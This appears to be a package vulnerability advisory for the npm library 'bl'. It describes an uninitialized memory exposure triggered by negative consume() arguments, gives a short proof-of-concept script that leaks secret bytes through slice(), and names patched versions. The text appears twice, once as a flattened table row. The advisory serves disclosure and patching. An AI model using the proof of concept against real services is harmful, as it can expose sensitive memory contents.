Vulnerability	Vulnerable Version
H Uninitialized Memory Exposure bl is a library that allows you to collect buffers and access with a standard readable buffer interface. Affected versions of this package are vulnerable to Uninitialized Memory Exposure. If user input ends up in `consume()` argument and can become negative, BufferList state can be corrupted, tricking it into exposing uninitialized memory via regular `.slice()` calls. PoC by chalker const { BufferList } = require('bl') const secret = require('crypto').randomBytes(256) for (let i = 0; i < 1e6; i++) { const clone = Buffer.from(secret) const bl = new BufferList() bl.append(Buffer.from('a')) bl.consume(-1024) const buf = bl.slice(1) if (buf.indexOf(clone) !== -1) { console.error(`Match (at ${i})`, buf) } } How to fix Uninitialized Memory Exposure? Upgrade `bl` to version 2.2.1, 3.0.1, 4.0.3, 1.2.3 or higher.	>=2.2.0 <2.2.1>=3.0.0 <3.0.1>=4.0.0 <4.0.3<1.2.3

Uninitialized Memory Exposure

bl is a library that allows you to collect buffers and access with a standard readable buffer interface.

Affected versions of this package are vulnerable to Uninitialized Memory Exposure. If user input ends up in consume() argument and can become negative, BufferList state can be corrupted, tricking it into exposing uninitialized memory via regular .slice() calls.

PoC by chalker

const { BufferList } = require('bl')
const secret = require('crypto').randomBytes(256)
for (let i = 0; i < 1e6; i++) {
  const clone = Buffer.from(secret)
  const bl = new BufferList()
  bl.append(Buffer.from('a'))
  bl.consume(-1024)
  const buf = bl.slice(1)
  if (buf.indexOf(clone) !== -1) {
    console.error(`Match (at ${i})`, buf)
  }
}

How to fix Uninitialized Memory Exposure?

Upgrade bl to version 2.2.1, 3.0.1, 4.0.3, 1.2.3 or higher.

>=2.2.0 <2.2.1>=3.0.0 <3.0.1>=4.0.0 <4.0.3<1.2.3

Go back to all versions of this package